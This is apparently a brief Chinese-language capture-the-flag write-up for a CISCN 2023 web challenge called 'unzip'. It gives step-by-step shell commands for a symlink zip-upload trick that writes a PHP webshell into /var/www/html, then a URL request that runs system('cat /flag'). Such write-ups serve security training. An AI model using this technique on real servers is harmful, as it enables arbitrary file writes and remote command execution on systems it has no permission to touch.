CISCN 2023 WEB
unzip
前置知識
unzip是linux系統下的一個解壓縮命令:
unzip指令解壓,將壓縮檔案test.zip在指定目錄
/tmp(當前)下解壓縮,如果已有相同的檔案存在,要求unzip命令覆蓋原先的檔案。
軟連線:類似於Windows的快捷方式,但是它可以直接操作軟連線指向的物件,而Windows是對於快捷方式檔案。
實現
ln -s /var/www/html link # 建立軟連線
zip -y link.zip link # -y保留連結模式壓縮
mkdir link # 故意相同檔名,方便後續覆蓋link指向的檔案地址(在該地址新增解壓出的檔案)
cd link
echo '' > shell.php # 建立木馬
zip -r link1.zip link # -r壓縮整個資料夾
然後再上次link.zip和link1.zip就能將shell.php傳到/var/www/html目錄下,然後直接cat /flag
url:port/shell.php?cmd=eval(system("cat /flag"));